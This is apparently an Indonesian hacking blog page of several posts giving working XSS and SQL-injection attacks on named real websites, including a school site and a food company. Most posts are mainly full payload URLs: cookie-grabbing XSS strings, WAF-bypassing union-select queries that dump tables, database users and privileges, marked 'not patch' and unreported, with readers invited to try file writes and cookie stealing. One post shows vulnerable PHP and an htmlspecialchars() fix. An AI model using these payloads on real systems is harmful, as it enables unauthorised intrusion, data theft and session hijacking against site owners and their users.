Showing posts with label XSS. Show all posts
Showing posts with label XSS. Show all posts

 

-
Hai sobat.
Saya ikal,
Disini saya akan share sesuatu nih.
-

Jadi kali ini kita bahas celah temuan siapa, ga tau siapa :D. 

Langsung saja. 
Html injection ini hanya berimpact pada client side saja atau apalah itu anjim saya ga tau :D.

Langsung saja, bug html injectionnya tereksekusi di dua tempat.

1. Search field

Hasil : 

2. Member profile 
Yang ini lu pikir sendiri caranya gimana :D.

Thanks
See u

 

-

Hai sobat.

Saya ikal,

Disini saya akan share sesuatu

-


Sudah 3 hari saya tidak membuat artikel :D.

Kali ini saya akan membuat artikel lagi dan kali ini kita akan membahas sebuah bug diwebsite realgood. 


Mungkin saat kalian kecil, kalian tau minuman ini. Penjelasan lebih rinci : 

https://realgood.id/tentang-kami


Langung saja, bug bertype Reflected XSS dan dapat tereksekusi dibeberapa bagian (Multiple).


Saya jelaskan secara rinci dan singkat saja.

1. On search field

Yang pertama celah tereksekusi dibagian kolum pencarian 


hasil : 

https://realgood.id/search?cx=004742806982428748186%3Awn2-jtxbryc&cof=FORID%3A9&ie=UTF-8&siteurl=https%3A%2F%2Frealgood.id%2Fsearch&q=%3Cimg+src%3Dx%20onerror=alert(1)%3E&save=Search



2. Member profile

kalo yang satu ini gak bisa diakses melalui url.


Write up : 

Register sebagai member di url sini dan isikan kolum name,city dengan payload xss, kolum lainnya isi sesuai kemauan kalian.


Jika sudah, kalian klik Signup dan kalian akan diarahkan kemember profile kalian, lalu payload pun tereksekusi.



Yup! Berhasil.

Segini aja artikel kali ini.


Thanks

See u

-
Hai sobat
Saya ikal,
Disini saya akan share cara menutup bug XSS
-

Tentu kalian pasti tau dengan kerentanan satu ini, jadi tidak perlu dijelaskan lagi. Kalian bisa cari sendiri penjelasannya.

Disini saya create subdo dari website dx.
site :
http://tester.draxploit.web.id/GET.php
http://tester.draxploit.web.id/POST.php
Note : itu web buat tester (percobaan) yah, itu emang sengaja di buat bug, jadi kalo ada yang report fix tolol :'v.

Jadi disitu ada yang POST dan GET. 
Codingan php POST yang rentan XSS : 

<form action="" method="post">
<input type="text" name="search" value="search now" />
<input type="submit" value="search" />
</form>
<?php
if (isset($_POST['search'])) 
echo 'tidak ada hasil untuk '.$_POST['search'];
?>

 Codingan php GET yang rentan XSS : 

<?php
$example = $_GET['example'];
  echo $example;
?>

Dan cara menutupnya adalah dengan memakai htmlspecialchars(). Taruh dibagian sesudah echo.

Codingan php POST yang sudah dipatch :

<form action="" method="post">
<input type="text" name="search" value="search now" />
<input type="submit" value="search" />
</form>
<?php
if (isset($_POST['search'])) 
echo 'tidak ada hasil untuk '.htmlspecialchars($_POST['search']);
?>
 
Codingan php GET yang sudah dipatch : 

<?php
$example = $_GET['example'];
  echo htmlspecialchars($example);
?>

Jadi kesimpulannya balut $ yang ada disesudah echo dengan htmlspecialchars

Thanks
See u 
-
Hai Sobat.
Saya ikal
Disini, saya akan share sesuatu nih
-

Jadi waktu itu saya lagi ngedork sqli, eh nemu web ini ckck, ga vuln terhadap sqli. Yaudah saya test html injection dan coba memasukan payload xss, dan hasilnya berhasil ckck.

Okeh langsung saja
Target : http://www.elmontfd.com 

Bug terletak di bagian calendar


Yaps, di path /calendarix/. Disitu ada column search yah, "Pasti bugnya disitu yah bang?" salah ckckc. Jadi bugnya ada di bagian bagian bawah tuh.

Jadi ini memanfaatkan request GET dari url dan otomatis angka atau huruf atau bahkan special char bisa masuk dan muncul di page tersebut.

HTML Injection and Reflected XSS :
http://www.elmontfd.com/calendarix/yearcal.php?op=yearcal&ycyear=2020%3Cbr/%3E%3Ch3%3E1K4lL_*%20|%20DragonXploiter%3C/h3%3E%3Cbr/%3E%3Cimg%20src=x%20onerror=prompt(%27?%27,document.cookie)%3E

Yaps mungkin segini saja
Thanks
See u
-
Hai Sobat.
Saya ikal
Disini, saya akan sharing-sharing sedikit nih
-

Berhubung saya belum mendapatkan target LFI dan laravel phpunit rce. Saya akan nge-share ini aja deh.

Apa itu XSS? Yah mungkin saya belum menjelaskan di blog ini, tapi kalian cari saja sendiri di web lain

Nah disini saya cuma ingin share cara melakukan reflected XSS. Langsung saja.
Target : ancol.com 
Payload : Payload 

Nah disini kita hanya mencoba untuk mendapatkan refleksi dari payload XSS tersebut atau yang sering di sebut reflected XSS.

Bagaimana caranya? Kita tinggal cari form search atau form yang dapat diisi dengan spesial char seperti <,',(,),", dan lainnya.


> di page awal website resmi taman impian ancol ini terlihat membingungkan, namun di pojok kanan atas kita melihat gambar kaca pembesar yang biasanya di buat icon untuk form search. Kita klik saja dan kita masukan payload sederhana


> disini saya memasukan payload "><script>alert('Y');</script> nah seperti itu. Lalu tinggal kalian klik enter dan lihat hasilnya.
> yang saya dapatkan dari form search tersebut hanyalah seperti ini :

Hasil pencarian tidak ditemukan. Nah tidak ada hasil untuk pencariannya, padahal kita telah memasukan sesuatu ke dalam form search, lalu? Bagaimana? Mari kita cek dengan melhat view-source: dan untuk pc kalian bisa klik Ctrl + F atau apalah itu. 
>dan jika sudah, kalian klik search in new tab. Itu fitur google chrome untuk memudahkan kita mencari sebuah kata. Disini karena saya memasukan payload "><script>alert('Y');</script> maka tinggal kalian cari saja kata alert. Seperti gambar di bawah ini : 


> setelah kita mencari kata alert, kita mendapatkan hasil 0/0 yang berarti tidak di temukan kata tersebut di dalam page.
> yasudah, mungkin sudah terdapat filter atau apalah itu. Lalu? Apa kita menyerah? Yah nggak lah orang udah jelas-jelas bisa reflected itu wkwk.
> sekarang mari kita pindah tempat atau sering di sebut dengan migrasi.

> disini kita akan pindah tempat ke halaman masuk atau login page yang terdapat di bawah icon search di pojok kanan atas.
> disini kita daftar dulu untuk menjadi member. Atau sering di bilang regmem. 


> terdapat dua tahap untuk menyelesaikan pendaftarannya. Di tahap pertama ini klian hanya perlu memasukan email asli untuk aktivasi, dan password dengan benar lalu di hafal. Sisanya kalian bisa isi dengan asal.
> jika sudah, kalian klik Selanjutnya untuk mengisi tahap ke dua. 


> di tahap kedua ini, kalian isi saja semua nya dengan asal. Lalu klik daftar dan kalian akan disuruh aktifasi akun.
> untuk aktivasi akun, kalian cukup pergi ke gmail dan klik verifikasi email dan kalian tinggal balik ke chrome kalian dan login dengan akun yang telah kalian aktifasi.

> jika sudah login, kalian akan jadi member dan sesuai dengan tujuan kita untuk melakukan reflected xss, kita tinggal mencari tempat untuk mengedit yang tidak terdapat filter atau htmlspecialchar.
> contoh disini kita akan mengedit info akun atau member. Kita klik edit profil.


> klik edit profil,


> ada dua tahap, tentunya kita akan memasukan payload xss ke semua tempat yang dapat menerima specialchar seperti <,(,',/, dan lainnya. 


> disini saya hanya mengisi payload di bagian nama lengkap, karena jika di email atau nomor telpon, yah pasti g bisa.
> klik selanjutnya dan kalian isi tahap ke dua seperti tahap pertama.


> disini kita hanya dapat mengisi payload di bagian alamat saja, tentunya karena di bagian kode pos hanya bisa memasukan angka.
> jika sudah mengisi, kalian klik ubah profil dan kalian pergi ke bagian profil. Lihat bagian mana yang mencerna payload xss tersebut.


> terlihat di bagian nama lengkap payload muncul namun tidak di cerna oleh server. Kemungkinan sudah di pasang htmlspecialchar di bagian tersebut. Namun di bagian alamat payload hilang dan kemungkinan payload tersebut masuk ke dalam database member hehe. 
> sekarang coba kita refresh dan pastikan javascript di browser kalian hidup.


> nah ternyata payload bekerja di dalam server dan itu akan terus muncul saat kita refresh. Karena payload sudah masuk ke dalam database member.
> yah segitu aja cara melakukan reflected XSS nya. Kalian bisa mendapatkan cookie dan berlanjut ke cookie stealing menggunakan payload yang berbeda.

Bug reflected XSS di website resmi taman impian ancol ini mungkin baru, karena saya search ke google tidak ada. Namun saya males report²

Status bug : not patch
Report : no report :'v
Penemu : haikal

Yah mungkin segini aja dulu. 
Thanks 
See u
-
Hai Sobat.
Saya ikal
Disini, saya akan share cara melakukan SQL Injection To XSS dump database in alert.
-

Disini saya ganti site aja deh, biar ga bosen itu-itu terus target nya hehe. Target saya kali ini adalah website mantan sekolah saya.
Target : Target 

Emang vuln? Yaps, gw yang pentest tuh site sekolah sendiri hehe, nanti dah gw buat artikelnya bagaimana caranya gw nemuin vulnerability nya.

Target nya itu adalah website pengumuman kelulusan, waktu itu ada tim yang nemuin celah add admin di website pengumuman kelulusan. Namun pas gw coba di website sekolah gw, dan hasilnya nihil. Yodah deh langsung mulai aja materi nya.

> pertama seperti biasa kalian cari parameter nya yah. Di target kali ini ada sebuah trick untuk mendapatkan parameternya yaitu dengan nomor peserta.
No peserta : 02-0103-0001-8

> lalu kalian masukan no peserta tersebut lalu klik cetak surat keterangan kelulusan dan kalian akan mendapatkan parameter nya.

http://smp162jakarta.com/Pengumuman-Kelulusan/cetaksk.php?noujian=02-0103-0001-8

Nah dapet kan. Kalian injeksi di parameter tersebut. Disini agar tidak terlalu lama, kita skip saja. Dan anggap saja saya sudah sampe ke tahap union select dan membypass waf bawaan dari web tersebut.

Untuk yang belum mengerti cara menginjeksi nya, kalian pergi ke artikel sebelumnya SQL Injection  

Dan langsung saja, berikut query dari website tersebut.

http://smp162jakarta.com/Pengumuman-Kelulusan/cetaksk.php?noujian=02-0103-0001-8%27%20and%200%20/*!50000%55nion*/%20/*!50000%53elect*/%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--%20-


Disitu kita di beri angka hampir semuanya bisa di gunaik :'v. Misal disini saya akan menggunakan angka 3, angka paling atas dan paling pertama saya lirik. 

Kita buat dulu code XSS nya lalu encode dan bungkus dengan concat. Karena website nya mempunyai waf maka kita bypass aja sekalian.

concat/*kontol*//**kontol**/(<script>alert('Injected By 1K4lL_* | ,(select(@x)/*!50000from/**kontol**/*/(/*!50000select/**kontol**/*/(@x:=0x00),(select(0)/*!From/**kontol**/*/(/*!50000information_schema.columns/**kontol**/*/)/*!50000where/**kontol**/*/(table_schema=database/*kontol*//**kontol*/())and(0x00)in(@x:=/*!50000coNcat/**kontol**/*/(@x,0x3c6c693e,/*!50000table_name/**kontol**/*/,0x3a3a,/*!50000column_name/**kontol**/*/))))x),');</script>)

Ko bypass nya gitu? Gw dapet tuh trick dari bule Philip. Jadi jangan salahkan gw.

Lalu bagaimana mengconvert nya? Apakah semua nya di convert atau di encode menjadi hex? tidak.

Bagian-bagian yang di convert atau di encode menjadi hex hanyalah bagian yang bukan perintah SQL atau apalah. setiap encode di batasi dengan tanda koma (,) agar terbaca oleh server. Dan di beri 0x sebelum encode an nya.

Contoh bagian yang di encode : 
1).<script>alert('Injected By 1K4lL_* | 
Encode menjadi hex :
0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a207cc2a0

2).');</script>
Encode menjadi hex :
0x27293b3c2f7363726970743e

Dan mari kita satukan, 
concat/*kontol*//**kontol**/(0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a207cc2a0,(select(@x)/*!50000from/**kontol**/*/(/*!50000select/**kontol**/*/(@x:=0x00),(select(0)/*!From/**kontol**/*/(/*!50000information_schema.columns/**kontol**/*/)/*!50000where/**kontol**/*/(table_schema=database/*kontol*//**kontol*/())and(0x00)in(@x:=/*!50000coNcat/**kontol**/*/(@x,0x3c6c693e,/*!50000table_name/**kontol**/*/,0x3a3a,/*!50000column_name/**kontol**/*/))))x),0x27293b3c2f7363726970743e)

Lalu kita taruh di angka togel, seperti yang tadi saya bilang saya ingin menempelkannya di angka 3.

http://smp162jakarta.com/Pengumuman-Kelulusan/cetaksk.php?noujian=02-0103-0001-8%27%20and%200%20/*!50000%55nion*/%20/*!50000%53elect*/%201,2,concat/*kontol*//**kontol**/(0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a207cc2a0,(select(@x)/*!50000from/**kontol**/*/(/*!50000select/**kontol**/*/(@x:=0x00),(select(0)/*!From/**kontol**/*/(/*!50000information_schema.columns/**kontol**/*/)/*!50000where/**kontol**/*/(table_schema=database/*kontol*//**kontol*/())and(0x00)in(@x:=/*!50000coNcat/**kontol**/*/(@x,0x3c6c693e,/*!50000table_name/**kontol**/*/,0x3a3a,/*!50000column_name/**kontol**/*/))))x),0x27293b3c2f7363726970743e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--%20-


Yaps berhasil, semua table yang ada di database sudah terlihat di alert hehe. Ini trick juga bisa di gunakan saat angka togel tidak terlihat atau harus view source saat melihat nya. Kalian tinggal tempel saja biar kalian bisa lihat tanpa harus view source atau apalah kalo di pc :'v.

Dan disini saya coba tambahkan database(),user(),version(),@@datadir,@@basedir,@@tmpdir biar lebih enjoy. Dan kita beri batasan <spasi>|<spasi>. Yang jika di encode menjadi 0x207c20

 contoh :
concat/*kontol*//**kontol**/(0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a207cc2a0,database/*kontol*//**kontol**/(),0x207c20,current_user,0x207c20,version(),0x207c20,@@datadir,0x207c20,@@basedir,0x207c20,@@tmpdir,0x207c20,(select(@x)/*!50000from/**kontol**/*/(/*!50000select/**kontol**/*/(@x:=0x00),(select(0)/*!From/**kontol**/*/(/*!50000information_schema.columns/**kontol**/*/)/*!50000where/**kontol**/*/(table_schema=database/*kontol*//**kontol*/())and(0x00)in(@x:=/*!50000coNcat/**kontol**/*/(@x,0x3c6c693e,/*!50000table_name/**kontol**/*/,0x3a3a,/*!50000column_name/**kontol**/*/))))x),0x27293b3c2f7363726970743e)

Dan sekarang kita tempel di angka 3 lagi.

http://smp162jakarta.com/Pengumuman-Kelulusan/cetaksk.php?noujian=02-0103-0001-8%27%20and%200%20/*!50000%55nion*/%20/*!50000%53elect*/%201,2,concat/*kontol*//**kontol**/(0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a207cc2a0,database/*kontol*//**kontol**/(),0x207c20,current_user,0x207c20,version(),0x207c20,@@datadir,0x207c20,@@basedir,0x207c20,@@tmpdir,0x207c20,(select(@x)/*!50000from/**kontol**/*/(/*!50000select/**kontol**/*/(@x:=0x00),(select(0)/*!From/**kontol**/*/(/*!50000information_schema.columns/**kontol**/*/)/*!50000where/**kontol**/*/(table_schema=database/*kontol*//**kontol*/())and(0x00)in(@x:=/*!50000coNcat/**kontol**/*/(@x,0x3c6c693e,/*!50000table_name/**kontol**/*/,0x3a3a,/*!50000column_name/**kontol**/*/))))x),0x27293b3c2f7363726970743e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--%20-


Nah udah enjoy liat nya. Okeh mungkin segini aja artikel nya. SQL to XSS next nya saya bingung belum dapat ide lagi soalnya. 

Reporter : haikal
Status bug : not patch
Report date : 14/06/2020
Developer : pak abuyah

Bagi yang mau report lagi, mending cari yang lain. Web sekolah lu gitu kan. Yodah lah kita mah enjoy-enjoy aja dah wkwk.

Thanks see
-
Hai Sobat.
Saya ikal
Disini, saya akan share cara melakukan SQL Injection To XSS print basic statement in alert.
-

Di artikel ini, hanya sambungan atau lanjutan dari artikel sebelumnya jadi bagi yang belum melihat artikel sebelumnya silakan klik SQL Injection To XSS 

Target masih sama, dan disini kita hanya mencoba print basic statement di alert XSS nya. Contohnya seperti ini.


Nah seperti itu. Disitu terlihat kata Injected By 1K4lL_* lalu tanda | sebagai pemisah antar jarak lalu nama database lalu tanda pemisah lalu nama user dan tanda pemisah lagi dan lalu versi yang terpakai dari website tersebut.

Btw, website nya memiliki user root@localhost dan user privilage yes dan file_priv mendapatkan Y.
Bagi yang ingin melakukan SQL Into Outfile silahkan di coba yah hehe. Bagi yang belum tau atau belum mengenal SQL Into Outfile silahkan baca artikel ini Cara melakukan SQL Into Outfile.  

Langsung saja, di artikel sebelumnya kita mendapat batas column di angka 147 dan mendapatkan angka togel 4,32,78,79,91,92,93,94,95,96,97.

http://skyfood.us/products-details.php?cd_item=8000011D-1230659122' and 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147-- -

Saya akan mencoba print di angka 4 dengan code xss seperti ini :
concat(<script>alert('Injected By 1K4lL_* |,database(),|,user(),|,version(),|,');</script>)

Lalu bagaimana mengconvert nya? Apakah semua nya di convert atau di encode menjadi hex? tidak.

Bagian-bagian yang di convert atau di encode menjadi hex hanyalah bagian yang bukan perintah SQL atau apalah :'v. Jadi bagian database() user() version() tidak perlu di encode. Dan setiap encode di batasi dengan tanda koma (,) agar terbaca oleh server. Dan di beri 0x sebelum encode an nya.

Contoh bagian yang di encode : 
1).<script>alert('Injected By 1K4lL_* | 
Encode menjadi hex :
0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a207cc2a0

2).
Encode menjadi hex :
0x207c20

3).
Encode menjadi hex :
0x207c20

4).
Encode menjadi hex :
0x207c20

5).');</script>
Encode menjadi hex :
0x27293b3c2f7363726970743e

Dan mari kita satukan dan bungkus dengan concat. Maka menjadi :
concat(0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a207cc2a0,database(),0x207c20,user(),0x207c20,version(),0x207c20,0x27293b3c2f7363726970743e)

Dan taruh concat tersebut di angka togel.

http://skyfood.us/products-details.php?cd_item=8000011D-1230659122' and 0 union select 1,2,3,concat(0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a207cc2a0,database(),0x207c20,user(),0x207c20,version(),0x207c20,0x27293b3c2f7363726970743e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147-- -

Maka basic statement dan nick pun akan terprint di dalam alert. Bukan di page website.


Yah mungkin segini ae dh. Masih ada lanjutannya nnti. Next artikel saya akan buat SQL to XSS dump database in alert.

Thanks 
See u
-
Hai Sobat.
Saya ikal
Disini, saya akan share cara melakukan SQL Injection To XSS
-

Apasih SQL Injection To XSS?
SQL Injection To XSS adalah SQL Injection biasa yang dimana saat tahap union select dan mendapat angka togel, angka togel tersebut di manfaatkan untuk mendapatkan alert dan prompt xss dengan mengconvert code xss tersebut lalu menaruh nya di angka togel.
Menurut saya :'v

Lalu bagaimana cara melakukannya? Let's do it with me.

Target : skyfood.us
Disini saya langsung memasukan tahap injeksi saja, agar tidak teslalu lama.

> Kita coba taruh single quote atau apalah itu.

http://skyfood.us/products-details.php?cd_item=8000011D-1230659122'

Maka akan terlihat berbeda dengan page normal nya.
> lanjut kita order by untuk menentukan batas column.
> disini saya sudah tau batas column di angka 147. Agar tidak terlalu lama. Bila ada yang belum tau cara menentukan batas column, kalian bisa cek artikel sebelumnya SQL Injection manual.

http://skyfood.us/products-details.php?cd_item=8000011D-1230659122' order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147-- -

> banyak sekali.
> sekarang kita union select untuk mendapatkan angka togel nya.

http://skyfood.us/products-details.php?cd_item=8000011D-1230659122' and 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147-- -


> dan kita di beri angka 4,32,78,79,91,92,93,94,95,96,97 untuk di gunakan.
> sekarang kita akan melakukan SQL Injection To XSS. dengan memasukan code :
<script>alert('1');</script>
Dan mengconvert nya, lalu membungkusnya dengan concat.

Contoh :
concat(<script>alert('Injected By 1K4lL_*');</script>)
Convert atau encode menjadi hex :
concat(0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a27293b3c2f7363726970743e)

> taruh di angka togel. Contoh :
http://skyfood.us/products-details.php?cd_item=8000011D-1230659122' and 0 union select 1,2,3,concat(0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a27293b3c2f7363726970743e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147-- -


> berhasil.
> sekarang kita coba get cookie and domain menggunakan prompt.
Contoh :
concat(<script>prompt('Injected By 1K4lL_*',document.cookie);</script>
Convert atau encode menjadi hex :
concat(0x3c7363726970743e70726f6d70742827496e6a656374656420427920314b346c4c5f2a272c646f63756d656e742e636f6f6b6965293b3c2f7363726970743e)

> Taruh di angka togel. Contoh :
http://skyfood.us/products-details.php?cd_item=8000011D-1230659122' and 0 union select 1,2,3,concat(0x3c7363726970743e70726f6d70742827496e6a656374656420427920314b346c4c5f2a272c646f63756d656e742e636f6f6b6965293b3c2f7363726970743e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147-- -


> berhasil.
> jika ingin get domain, kalian tinggal mengganti nya menjadi :
concat(<script>prompt('Injected By 1K4lL_*',document.domain);</script>)
Lalu encode dan tempel di angka togel.

Okeh, sekian dari saya. Next article saya akan membuat SQL Injection To XSS dump basic statement in alert.
Thanks
See u